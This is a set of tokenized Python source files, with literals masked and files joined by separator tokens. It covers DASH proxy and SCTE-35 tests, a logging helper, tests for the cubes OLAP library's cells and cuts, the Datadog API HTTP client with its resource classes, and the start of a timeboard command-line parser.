<EOL> dp = dash_proxy . DashProvider ( "<STR_LIT:127.0.0.1>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = now ) <EOL> d = dp . handle_request ( ) <EOL> write_data_to_outfile ( d , testOutputFile ) <EOL> def testMediaMux ( self ) : <EOL> testOutputFile = "<STR_LIT>" <EOL> rm_outfile ( testOutputFile ) <EOL> now = <NUM_LIT> <EOL> segment = "<STR_LIT>" % ( ( now - <NUM_LIT> ) / <NUM_LIT:6> ) <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , segment ] <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT:127.0.0.1>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = now ) <EOL> d = dp . 
handle_request ( ) <EOL> write_data_to_outfile ( d , testOutputFile ) <EOL> class TestScte35Manifest ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> now = <NUM_LIT> <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT:127.0.0.1>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = now ) <EOL> self . mpd = dp . handle_request ( ) <EOL> def test_scte35_profile_presence ( self ) : <EOL> self . assertTrue ( self . mpd . find ( "<STR_LIT>" ) > <NUM_LIT:0> ) <EOL> def test_inband_stream_signal ( self ) : <EOL> self . assertTrue ( self . mpd . find ( '<STR_LIT>' ) > <NUM_LIT:0> ) <EOL> class TestScte35Segments ( unittest . TestCase ) : <EOL> def testScte35Event ( self ) : <EOL> testOutputFile = "<STR_LIT>" <EOL> rm_outfile ( testOutputFile ) <EOL> segDur = <NUM_LIT:6> <EOL> segNr = <NUM_LIT> <EOL> now = segNr * segDur + <NUM_LIT:50> <EOL> segment = "<STR_LIT>" % segNr <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , segment ] <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT:127.0.0.1>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = now ) <EOL> d = dp . handle_request ( ) <EOL> self . assertEqual ( d . find ( '<STR_LIT>' ) , <NUM_LIT> ) <EOL> write_data_to_outfile ( d , testOutputFile ) <EOL> def testNoScte35Event ( self ) : <EOL> segDur = <NUM_LIT:6> <EOL> segNr = <NUM_LIT> <EOL> now = segNr * segDur + <NUM_LIT:50> <EOL> segment = "<STR_LIT>" % segNr <EOL> urlParts = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , segment ] <EOL> dp = dash_proxy . DashProvider ( "<STR_LIT:127.0.0.1>" , urlParts , None , VOD_CONFIG_DIR , CONTENT_ROOT , now = now ) <EOL> d = dp . handle_request ( ) <EOL> self . assertEqual ( d . find ( '<STR_LIT>' ) , - <NUM_LIT:1> ) </s>
<s> from __future__ import absolute_import <EOL> from logging import getLogger , Formatter , StreamHandler , FileHandler <EOL> from . errors import * <EOL> __all__ = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] <EOL> DEFAULT_LOGGER_NAME = "<STR_LIT>" <EOL> DEFAULT_FORMAT = "<STR_LIT>" <EOL> logger = None <EOL> def get_logger ( path = None , format_ = None , name = None ) : <EOL> """<STR_LIT>""" <EOL> global logger <EOL> if logger : <EOL> return logger <EOL> else : <EOL> return create_logger ( path , format_ , name ) <EOL> def create_logger ( path = None , format_ = None , name = None ) : <EOL> """<STR_LIT>""" <EOL> global logger <EOL> logger = getLogger ( name or DEFAULT_LOGGER_NAME ) <EOL> if not logger . handlers : <EOL> formatter = Formatter ( fmt = format_ or DEFAULT_FORMAT ) <EOL> if path : <EOL> handler = FileHandler ( path ) <EOL> else : <EOL> handler = StreamHandler ( ) <EOL> handler . setFormatter ( formatter ) <EOL> logger . addHandler ( handler ) <EOL> return logger </s>
<s> import unittest <EOL> from cubes . cells import Cell , PointCut , SetCut , RangeCut <EOL> from cubes . cells import string_from_path , cut_from_string , path_from_string <EOL> from cubes . cells import cut_from_dict <EOL> from cubes . errors import CubesError , ArgumentError <EOL> from cubes . errors import HierarchyError , NoSuchDimensionError <EOL> from . common import CubesTestCaseBase , create_provider <EOL> class CutsTestCase ( CubesTestCaseBase ) : <EOL> def setUp ( self ) : <EOL> super ( CutsTestCase , self ) . setUp ( ) <EOL> self . provider = create_provider ( "<STR_LIT>" ) <EOL> self . cube = self . provider . cube ( "<STR_LIT>" ) <EOL> self . dim_date = self . cube . dimension ( "<STR_LIT:date>" ) <EOL> def test_cut_depth ( self ) : <EOL> dim = self . cube . dimension ( "<STR_LIT:date>" ) <EOL> self . assertEqual ( <NUM_LIT:1> , PointCut ( dim , [ <NUM_LIT:1> ] ) . level_depth ( ) ) <EOL> self . assertEqual ( <NUM_LIT:3> , PointCut ( dim , [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] ) . level_depth ( ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , RangeCut ( dim , [ <NUM_LIT:1> ] , [ <NUM_LIT:1> ] ) . level_depth ( ) ) <EOL> self . assertEqual ( <NUM_LIT:3> , RangeCut ( dim , [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] , [ <NUM_LIT:1> ] ) . level_depth ( ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , SetCut ( dim , [ [ <NUM_LIT:1> ] , [ <NUM_LIT:1> ] ] ) . level_depth ( ) ) <EOL> self . assertEqual ( <NUM_LIT:3> , SetCut ( dim , [ [ <NUM_LIT:1> ] , [ <NUM_LIT:1> ] , [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] ] ) . level_depth ( ) ) <EOL> def test_cut_from_dict ( self ) : <EOL> d = { "<STR_LIT:type>" : "<STR_LIT>" , "<STR_LIT:path>" : [ <NUM_LIT> ] , "<STR_LIT>" : "<STR_LIT:date>" , <EOL> "<STR_LIT>" : <NUM_LIT:1> , "<STR_LIT>" : None , "<STR_LIT>" : False , <EOL> "<STR_LIT>" : False } <EOL> cut = cut_from_dict ( d ) <EOL> tcut = PointCut ( "<STR_LIT:date>" , [ <NUM_LIT> ] ) <EOL> self . assertEqual ( tcut , cut ) <EOL> self . 
assertEqual ( dict ( d ) , tcut . to_dict ( ) ) <EOL> self . _assert_invert ( d , cut , tcut ) <EOL> d = { "<STR_LIT:type>" : "<STR_LIT>" , "<STR_LIT>" : [ <NUM_LIT> ] , "<STR_LIT:to>" : [ <NUM_LIT> , <NUM_LIT:10> ] , "<STR_LIT>" : <EOL> "<STR_LIT:date>" , "<STR_LIT>" : <NUM_LIT:2> , "<STR_LIT>" : None , "<STR_LIT>" : False , <EOL> "<STR_LIT>" : False } <EOL> cut = cut_from_dict ( d ) <EOL> tcut = RangeCut ( "<STR_LIT:date>" , [ <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT:10> ] ) <EOL> self . assertEqual ( tcut , cut ) <EOL> self . assertEqual ( dict ( d ) , tcut . to_dict ( ) ) <EOL> self . _assert_invert ( d , cut , tcut ) <EOL> d = { "<STR_LIT:type>" : "<STR_LIT>" , "<STR_LIT>" : [ [ <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT:10> ] ] , "<STR_LIT>" : "<STR_LIT:date>" , <EOL> "<STR_LIT>" : <NUM_LIT:2> , "<STR_LIT>" : None , "<STR_LIT>" : False , <EOL> "<STR_LIT>" : False } <EOL> cut = cut_from_dict ( d ) <EOL> tcut = SetCut ( "<STR_LIT:date>" , [ [ <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT:10> ] ] ) <EOL> self . assertEqual ( tcut , cut ) <EOL> self . assertEqual ( dict ( d ) , tcut . to_dict ( ) ) <EOL> self . _assert_invert ( d , cut , tcut ) <EOL> self . assertRaises ( ArgumentError , cut_from_dict , { "<STR_LIT:type>" : "<STR_LIT>" } ) <EOL> def _assert_invert ( self , d , cut , tcut ) : <EOL> cut . invert = True <EOL> tcut . invert = True <EOL> d [ "<STR_LIT>" ] = True <EOL> self . assertEqual ( tcut , cut ) <EOL> self . assertEqual ( dict ( d ) , tcut . to_dict ( ) ) <EOL> class StringConversionsTestCase ( unittest . TestCase ) : <EOL> def test_cut_string_conversions ( self ) : <EOL> cut = PointCut ( "<STR_LIT:foo>" , [ "<STR_LIT>" ] ) <EOL> self . assertEqual ( "<STR_LIT>" , str ( cut ) ) <EOL> self . assertEqual ( cut , cut_from_string ( "<STR_LIT>" ) ) <EOL> cut = PointCut ( "<STR_LIT:foo>" , [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:_>" ] ) <EOL> self . assertEqual ( "<STR_LIT>" , str ( cut ) ) <EOL> self . 
assertEqual ( cut , cut_from_string ( "<STR_LIT>" ) ) <EOL> cut = PointCut ( "<STR_LIT:foo>" , [ "<STR_LIT>" ] ) <EOL> self . assertEqual ( r"<STR_LIT>" , str ( cut ) ) <EOL> self . assertEqual ( cut , cut_from_string ( "<STR_LIT>" ) ) <EOL> cut = PointCut ( "<STR_LIT:foo>" , [ "<STR_LIT>" ] ) <EOL> self . assertEqual ( "<STR_LIT>" , str ( cut ) ) <EOL> self . assertEqual ( cut , cut_from_string ( "<STR_LIT>" ) ) <EOL> cut = PointCut ( "<STR_LIT:foo>" , [ "<STR_LIT>" ] ) <EOL> self . assertEqual ( "<STR_LIT>" , str ( cut ) ) <EOL> self . assertEqual ( cut , cut_from_string ( "<STR_LIT>" ) ) <EOL> def test_special_characters ( self ) : <EOL> self . assertEqual ( '<STR_LIT>' , <EOL> string_from_path ( [ "<STR_LIT>" , "<STR_LIT>" , <NUM_LIT:100> ] ) ) <EOL> def test_string_from_path ( self ) : <EOL> self . assertEqual ( '<STR_LIT>' , <EOL> string_from_path ( [ "<STR_LIT>" , "<STR_LIT>" , <NUM_LIT:100> ] ) ) <EOL> self . assertEqual ( '<STR_LIT>' , string_from_path ( [ ] ) ) <EOL> self . assertEqual ( '<STR_LIT>' , string_from_path ( None ) ) <EOL> def test_path_from_string ( self ) : <EOL> self . assertEqual ( [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:100>" ] , <EOL> path_from_string ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( [ ] , path_from_string ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( [ ] , path_from_string ( None ) ) <EOL> def test_set_cut_string ( self ) : <EOL> cut = SetCut ( "<STR_LIT:foo>" , [ [ "<STR_LIT:1>" ] , [ "<STR_LIT:2>" , "<STR_LIT:3>" ] , [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:100>" ] ] ) <EOL> self . assertEqual ( "<STR_LIT>" , str ( cut ) ) <EOL> self . assertEqual ( cut , cut_from_string ( "<STR_LIT>" ) ) <EOL> cut = SetCut ( "<STR_LIT:foo>" , [ [ "<STR_LIT>" ] ] ) <EOL> self . assertEqual ( "<STR_LIT>" , str ( cut ) ) <EOL> self . assertEqual ( PointCut ( "<STR_LIT:foo>" , [ "<STR_LIT>" ] ) , cut_from_string ( "<STR_LIT>" ) ) <EOL> cut = SetCut ( "<STR_LIT:foo>" , [ [ "<STR_LIT>" ] ] ) <EOL> self . 
assertEqual ( "<STR_LIT>" , str ( cut ) ) <EOL> self . assertEqual ( PointCut ( "<STR_LIT:foo>" , [ "<STR_LIT>" ] ) , cut_from_string ( "<STR_LIT>" ) ) <EOL> def test_range_cut_string ( self ) : <EOL> cut = RangeCut ( "<STR_LIT:date>" , [ "<STR_LIT>" ] , [ "<STR_LIT>" ] ) <EOL> self . assertEqual ( "<STR_LIT>" , str ( cut ) ) <EOL> self . assertEqual ( cut , cut_from_string ( "<STR_LIT>" ) ) <EOL> cut = RangeCut ( "<STR_LIT:date>" , [ "<STR_LIT>" ] , None ) <EOL> self . assertEqual ( "<STR_LIT>" , str ( cut ) ) <EOL> cut = cut_from_string ( "<STR_LIT>" ) <EOL> if cut . to_path : <EOL> self . fail ( '<STR_LIT>' % ( cut . to_path , ) ) <EOL> cut = RangeCut ( "<STR_LIT:date>" , None , [ "<STR_LIT>" ] ) <EOL> self . assertEqual ( "<STR_LIT>" , str ( cut ) ) <EOL> cut = cut_from_string ( "<STR_LIT>" ) <EOL> if cut . from_path : <EOL> self . fail ( '<STR_LIT>' % ( cut . from_path , ) ) <EOL> cut = RangeCut ( "<STR_LIT:date>" , [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , [ "<STR_LIT>" , "<STR_LIT:2>" , "<STR_LIT:3>" ] ) <EOL> self . assertEqual ( "<STR_LIT>" , str ( cut ) ) <EOL> self . assertEqual ( cut , cut_from_string ( "<STR_LIT>" ) ) <EOL> cut = RangeCut ( "<STR_LIT:foo>" , [ "<STR_LIT>" ] , [ "<STR_LIT:1>" ] ) <EOL> self . assertEqual ( "<STR_LIT>" , str ( cut ) ) <EOL> self . assertEqual ( cut , cut_from_string ( "<STR_LIT>" ) ) <EOL> cut = RangeCut ( "<STR_LIT:foo>" , [ "<STR_LIT>" ] , [ "<STR_LIT:1>" ] ) <EOL> self . assertEqual ( r"<STR_LIT>" , str ( cut ) ) <EOL> self . assertEqual ( cut , cut_from_string ( r"<STR_LIT>" ) ) <EOL> def test_hierarchy_cut ( self ) : <EOL> cut = PointCut ( "<STR_LIT:date>" , [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> self . assertEqual ( "<STR_LIT>" , str ( cut ) ) <EOL> self . assertEqual ( cut , cut_from_string ( "<STR_LIT>" ) ) <EOL> class CellInteractiveSlicingTestCase ( CubesTestCaseBase ) : <EOL> def setUp ( self ) : <EOL> super ( CellInteractiveSlicingTestCase , self ) . setUp ( ) <EOL> self . 
provider = create_provider ( "<STR_LIT>" ) <EOL> self . cube = self . provider . cube ( "<STR_LIT>" ) <EOL> def test_cutting ( self ) : <EOL> full_cube = Cell ( self . cube ) <EOL> self . assertEqual ( self . cube , full_cube . cube ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( full_cube . cuts ) ) <EOL> cell = full_cube . slice ( PointCut ( "<STR_LIT:date>" , [ <NUM_LIT> ] ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( cell . cuts ) ) <EOL> cell = cell . slice ( PointCut ( "<STR_LIT>" , [ <NUM_LIT> ] ) ) <EOL> cell = cell . slice ( PointCut ( "<STR_LIT>" , [ <NUM_LIT:50> , <NUM_LIT:20> ] ) ) <EOL> self . assertEqual ( <NUM_LIT:3> , len ( cell . cuts ) ) <EOL> self . assertEqual ( self . cube , cell . cube ) <EOL> cell = cell . slice ( PointCut ( "<STR_LIT:date>" , [ <NUM_LIT> ] ) ) <EOL> self . assertEqual ( <NUM_LIT:3> , len ( cell . cuts ) ) <EOL> def test_multi_slice ( self ) : <EOL> full_cube = Cell ( self . cube ) <EOL> cuts_list = ( <EOL> PointCut ( "<STR_LIT:date>" , [ <NUM_LIT> ] ) , <EOL> PointCut ( "<STR_LIT>" , [ <NUM_LIT:50> , <NUM_LIT:20> ] ) , <EOL> PointCut ( "<STR_LIT>" , [ <NUM_LIT> ] ) ) <EOL> cell_list = full_cube . multi_slice ( cuts_list ) <EOL> self . assertEqual ( <NUM_LIT:3> , len ( cell_list . cuts ) ) <EOL> self . assertRaises ( CubesError , full_cube . multi_slice , { } ) <EOL> def test_get_cell_dimension_cut ( self ) : <EOL> full_cube = Cell ( self . cube ) <EOL> cell = full_cube . slice ( PointCut ( "<STR_LIT:date>" , [ <NUM_LIT> ] ) ) <EOL> cell = cell . slice ( PointCut ( "<STR_LIT>" , [ <NUM_LIT> ] ) ) <EOL> cut = cell . cut_for_dimension ( "<STR_LIT:date>" ) <EOL> self . assertEqual ( str ( cut . dimension ) , "<STR_LIT:date>" ) <EOL> self . assertRaises ( NoSuchDimensionError , cell . cut_for_dimension , "<STR_LIT>" ) <EOL> cut = cell . cut_for_dimension ( "<STR_LIT>" ) <EOL> self . assertEqual ( cut , None ) <EOL> def test_hierarchy_path ( self ) : <EOL> dim = self . cube . dimension ( "<STR_LIT>" ) <EOL> hier = dim . 
hierarchy ( ) <EOL> levels = hier . levels_for_path ( [ ] ) <EOL> self . assertEqual ( len ( levels ) , <NUM_LIT:0> ) <EOL> levels = hier . levels_for_path ( None ) <EOL> self . assertEqual ( len ( levels ) , <NUM_LIT:0> ) <EOL> levels = hier . levels_for_path ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] ) <EOL> self . assertEqual ( len ( levels ) , <NUM_LIT:4> ) <EOL> names = [ level . name for level in levels ] <EOL> self . assertEqual ( names , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:class>' , '<STR_LIT>' ] ) <EOL> self . assertRaises ( HierarchyError , hier . levels_for_path , <EOL> [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:8> ] ) <EOL> def test_hierarchy_drilldown_levels ( self ) : <EOL> dim = self . cube . dimension ( "<STR_LIT>" ) <EOL> hier = dim . hierarchy ( ) <EOL> levels = hier . levels_for_path ( [ ] , drilldown = True ) <EOL> self . assertEqual ( len ( levels ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( levels [ <NUM_LIT:0> ] . name , '<STR_LIT>' ) <EOL> levels = hier . levels_for_path ( None , drilldown = True ) <EOL> self . assertEqual ( len ( levels ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( levels [ <NUM_LIT:0> ] . name , '<STR_LIT>' ) <EOL> def test_slice_drilldown ( self ) : <EOL> cut = PointCut ( "<STR_LIT:date>" , [ ] ) <EOL> original_cell = Cell ( self . cube , [ cut ] ) <EOL> cell = original_cell . drilldown ( "<STR_LIT:date>" , <NUM_LIT> ) <EOL> self . assertEqual ( [ <NUM_LIT> ] , cell . cut_for_dimension ( "<STR_LIT:date>" ) . path ) <EOL> cell = cell . drilldown ( "<STR_LIT:date>" , <NUM_LIT:1> ) <EOL> self . assertEqual ( [ <NUM_LIT> , <NUM_LIT:1> ] , cell . cut_for_dimension ( "<STR_LIT:date>" ) . path ) <EOL> cell = cell . drilldown ( "<STR_LIT:date>" , <NUM_LIT:2> ) <EOL> self . assertEqual ( [ <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:2> ] , cell . cut_for_dimension ( "<STR_LIT:date>" ) . path ) <EOL> def test_suite ( ) : <EOL> suite = unittest . 
TestSuite ( ) <EOL> suite . addTest ( unittest . makeSuite ( AggregationBrowserTestCase ) ) <EOL> suite . addTest ( unittest . makeSuite ( CellsAndCutsTestCase ) ) <EOL> return suite </s>
<s> import time <EOL> import logging <EOL> import requests <EOL> import simplejson as json <EOL> from datadog . api . exceptions import ClientError , ApiError , HttpBackoff , HttpTimeout , ApiNotInitialized <EOL> from datadog . api import _api_version , _max_timeouts , _backoff_period <EOL> from datadog . util . compat import is_p3k <EOL> log = logging . getLogger ( '<STR_LIT>' ) <EOL> class HTTPClient ( object ) : <EOL> """<STR_LIT>""" <EOL> _backoff_period = _backoff_period <EOL> _max_timeouts = _max_timeouts <EOL> _backoff_timestamp = None <EOL> _timeout_counter = <NUM_LIT:0> <EOL> _api_version = _api_version <EOL> @ classmethod <EOL> def request ( cls , method , path , body = None , attach_host_name = False , response_formatter = None , <EOL> error_formatter = None , ** params ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> if not cls . _should_submit ( ) : <EOL> raise HttpBackoff ( "<STR_LIT>" <EOL> . format ( * cls . _backoff_status ( ) ) ) <EOL> from datadog . api import _api_key , _application_key , _api_host , _mute , _host_name , _proxies , _max_retries , _timeout , _cacert <EOL> if _api_key is None : <EOL> raise ApiNotInitialized ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> params [ '<STR_LIT>' ] = _api_key <EOL> if _application_key : <EOL> params [ '<STR_LIT>' ] = _application_key <EOL> url = "<STR_LIT>" % ( _api_host , cls . _api_version , path . lstrip ( "<STR_LIT:/>" ) ) <EOL> if attach_host_name and body : <EOL> if '<STR_LIT>' in body : <EOL> for obj_params in body [ '<STR_LIT>' ] : <EOL> if obj_params . get ( '<STR_LIT:host>' , "<STR_LIT>" ) == "<STR_LIT>" : <EOL> obj_params [ '<STR_LIT:host>' ] = _host_name <EOL> else : <EOL> if body . get ( '<STR_LIT:host>' , "<STR_LIT>" ) == "<STR_LIT>" : <EOL> body [ '<STR_LIT:host>' ] = _host_name <EOL> if '<STR_LIT>' in params and isinstance ( params [ '<STR_LIT>' ] , list ) : <EOL> params [ '<STR_LIT>' ] = '<STR_LIT:U+002C>' . 
join ( params [ '<STR_LIT>' ] ) <EOL> headers = { } <EOL> if isinstance ( body , dict ) : <EOL> body = json . dumps ( body ) <EOL> headers [ '<STR_LIT:Content-Type>' ] = '<STR_LIT:application/json>' <EOL> start_time = time . time ( ) <EOL> try : <EOL> s = requests . Session ( ) <EOL> http_adapter = requests . adapters . HTTPAdapter ( max_retries = _max_retries ) <EOL> s . mount ( '<STR_LIT>' , http_adapter ) <EOL> result = s . request ( <EOL> method , <EOL> url , <EOL> headers = headers , <EOL> params = params , <EOL> data = body , <EOL> timeout = _timeout , <EOL> proxies = _proxies , <EOL> verify = _cacert ) <EOL> result . raise_for_status ( ) <EOL> except requests . ConnectionError as e : <EOL> raise ClientError ( "<STR_LIT>" % ( method , _api_host , url , e ) ) <EOL> except requests . exceptions . Timeout as e : <EOL> cls . _timeout_counter += <NUM_LIT:1> <EOL> raise HttpTimeout ( '<STR_LIT>' % ( method , url , _timeout ) ) <EOL> except requests . exceptions . HTTPError as e : <EOL> if e . response . status_code in ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) : <EOL> pass <EOL> else : <EOL> raise <EOL> except TypeError as e : <EOL> raise TypeError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> duration = round ( ( time . time ( ) - start_time ) * <NUM_LIT> , <NUM_LIT:4> ) <EOL> log . info ( "<STR_LIT>" % ( result . status_code , method , url , duration ) ) <EOL> cls . _timeout_counter = <NUM_LIT:0> <EOL> content = result . content <EOL> if content : <EOL> try : <EOL> if is_p3k ( ) : <EOL> response_obj = json . loads ( content . decode ( '<STR_LIT:utf-8>' ) ) <EOL> else : <EOL> response_obj = json . loads ( content ) <EOL> except ValueError : <EOL> raise ValueError ( '<STR_LIT>' . 
format ( content ) ) <EOL> if response_obj and '<STR_LIT>' in response_obj : <EOL> raise ApiError ( response_obj ) <EOL> else : <EOL> response_obj = None <EOL> if response_formatter is None : <EOL> return response_obj <EOL> else : <EOL> return response_formatter ( response_obj ) <EOL> except ClientError as e : <EOL> if _mute : <EOL> log . error ( str ( e ) ) <EOL> if error_formatter is None : <EOL> return { '<STR_LIT>' : e . args [ <NUM_LIT:0> ] } <EOL> else : <EOL> return error_formatter ( { '<STR_LIT>' : e . args [ <NUM_LIT:0> ] } ) <EOL> else : <EOL> raise <EOL> except ApiError as e : <EOL> if _mute : <EOL> for error in e . args [ <NUM_LIT:0> ] [ '<STR_LIT>' ] : <EOL> log . error ( str ( error ) ) <EOL> if error_formatter is None : <EOL> return e . args [ <NUM_LIT:0> ] <EOL> else : <EOL> return error_formatter ( e . args [ <NUM_LIT:0> ] ) <EOL> else : <EOL> raise <EOL> @ classmethod <EOL> def _should_submit ( cls ) : <EOL> """<STR_LIT>""" <EOL> now = time . time ( ) <EOL> should_submit = False <EOL> if not cls . _backoff_timestamp and cls . _timeout_counter >= cls . _max_timeouts : <EOL> log . info ( "<STR_LIT>" <EOL> . format ( cls . _backoff_period ) ) <EOL> cls . _backoff_timestamp = now <EOL> should_submit = False <EOL> elif cls . _backoff_timestamp : <EOL> backed_off_time , backoff_time_left = cls . _backoff_status ( ) <EOL> if backoff_time_left < <NUM_LIT:0> : <EOL> log . info ( "<STR_LIT>" <EOL> . format ( backed_off_time ) ) <EOL> cls . _backoff_timestamp = None <EOL> cls . _timeout_counter = <NUM_LIT:0> <EOL> should_submit = True <EOL> else : <EOL> log . info ( "<STR_LIT>" <EOL> . format ( backoff_time_left ) ) <EOL> should_submit = False <EOL> else : <EOL> should_submit = True <EOL> return should_submit <EOL> @ classmethod <EOL> def _backoff_status ( cls ) : <EOL> now = time . time ( ) <EOL> backed_off_time = now - cls . _backoff_timestamp <EOL> backoff_time_left = cls . 
_backoff_period - backed_off_time <EOL> return round ( backed_off_time , <NUM_LIT:2> ) , round ( backoff_time_left , <NUM_LIT:2> ) <EOL> class CreateableAPIResource ( object ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def create ( cls , attach_host_name = False , method = '<STR_LIT:POST>' , id = None , params = None , ** body ) : <EOL> """<STR_LIT>""" <EOL> if params is None : <EOL> params = { } <EOL> if method == '<STR_LIT:GET>' : <EOL> return HTTPClient . request ( '<STR_LIT:GET>' , cls . _class_url , ** body ) <EOL> if id is None : <EOL> return HTTPClient . request ( '<STR_LIT:POST>' , cls . _class_url , body , <EOL> attach_host_name = attach_host_name , ** params ) <EOL> else : <EOL> return HTTPClient . request ( '<STR_LIT:POST>' , cls . _class_url + "<STR_LIT:/>" + str ( id ) , body , <EOL> attach_host_name = attach_host_name , ** params ) <EOL> class SendableAPIResource ( object ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def send ( cls , attach_host_name = False , id = None , ** body ) : <EOL> """<STR_LIT>""" <EOL> if id is None : <EOL> return HTTPClient . request ( '<STR_LIT:POST>' , cls . _class_url , body , <EOL> attach_host_name = attach_host_name ) <EOL> else : <EOL> return HTTPClient . request ( '<STR_LIT:POST>' , cls . _class_url + "<STR_LIT:/>" + str ( id ) , body , <EOL> attach_host_name = attach_host_name ) <EOL> class UpdatableAPIResource ( object ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def update ( cls , id , params = None , ** body ) : <EOL> """<STR_LIT>""" <EOL> if params is None : <EOL> params = { } <EOL> return HTTPClient . request ( '<STR_LIT>' , cls . _class_url + "<STR_LIT:/>" + str ( id ) , body , ** params ) <EOL> class DeletableAPIResource ( object ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def delete ( cls , id , ** params ) : <EOL> """<STR_LIT>""" <EOL> return HTTPClient . request ( '<STR_LIT>' , cls . 
_class_url + "<STR_LIT:/>" + str ( id ) , ** params ) <EOL> class GetableAPIResource ( object ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def get ( cls , id , ** params ) : <EOL> """<STR_LIT>""" <EOL> return HTTPClient . request ( '<STR_LIT:GET>' , cls . _class_url + "<STR_LIT:/>" + str ( id ) , ** params ) <EOL> class ListableAPIResource ( object ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def get_all ( cls , ** params ) : <EOL> """<STR_LIT>""" <EOL> return HTTPClient . request ( '<STR_LIT:GET>' , cls . _class_url , ** params ) <EOL> class SearchableAPIResource ( object ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def _search ( cls , ** params ) : <EOL> """<STR_LIT>""" <EOL> return HTTPClient . request ( '<STR_LIT:GET>' , cls . _class_url , ** params ) <EOL> class ActionAPIResource ( object ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def _trigger_class_action ( cls , method , name , id = None , ** params ) : <EOL> """<STR_LIT>""" <EOL> if id is None : <EOL> return HTTPClient . request ( method , cls . _class_url + "<STR_LIT:/>" + name , params ) <EOL> else : <EOL> return HTTPClient . request ( method , cls . _class_url + "<STR_LIT:/>" + str ( id ) + "<STR_LIT:/>" + name , params ) <EOL> @ classmethod <EOL> def _trigger_action ( cls , method , name , id = None , ** params ) : <EOL> """<STR_LIT>""" <EOL> if id is None : <EOL> return HTTPClient . request ( method , name , params ) <EOL> else : <EOL> return HTTPClient . request ( method , name + "<STR_LIT:/>" + str ( id ) , params ) </s>
<s> import os . path <EOL> import platform <EOL> import sys <EOL> import webbrowser <EOL> import argparse <EOL> import simplejson as json <EOL> from datadog import api <EOL> from datadog . util . format import pretty_json <EOL> from datadog . dogshell . common import report_errors , report_warnings , print_err <EOL> from datetime import datetime <EOL> class TimeboardClient ( object ) : <EOL> @ classmethod <EOL> def setup_parser ( cls , subparsers ) : <EOL> parser = subparsers . add_parser ( '<STR_LIT>' , help = "<STR_LIT>" ) <EOL> parser . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , <EOL> help = "<STR_LIT>" ) <EOL> verb_parsers = parser . add_subparsers ( title = '<STR_LIT>' , dest = '<STR_LIT>' ) <EOL> verb_parsers . required = True <EOL> post_parser = verb_parsers . add_parser ( '<STR_LIT>' , help = "<STR_LIT>" ) <EOL> post_parser . add_argument ( '<STR_LIT:title>' , help = "<STR_LIT>" ) <EOL> post_parser . add_argument ( '<STR_LIT:description>' , help = "<STR_LIT>" ) <EOL> post_parser . add_argument ( '<STR_LIT>' , help = "<STR_LIT>" <EOL> "<STR_LIT>" , nargs = "<STR_LIT:?>" ) <EOL> post_parser . add_argument ( '<STR_LIT>' , type = _template_variables , default = [ ] , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> post_parser . set_defaults ( func = cls . _post ) <EOL> update_parser = verb_parsers . add_parser ( '<STR_LIT>' , help = "<STR_LIT>" ) <EOL> update_parser . add_argument ( '<STR_LIT>' , help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> update_parser . add_argument ( '<STR_LIT:title>' , help = "<STR_LIT>" ) <EOL> update_parser . add_argument ( '<STR_LIT:description>' , help = "<STR_LIT>" ) <EOL> 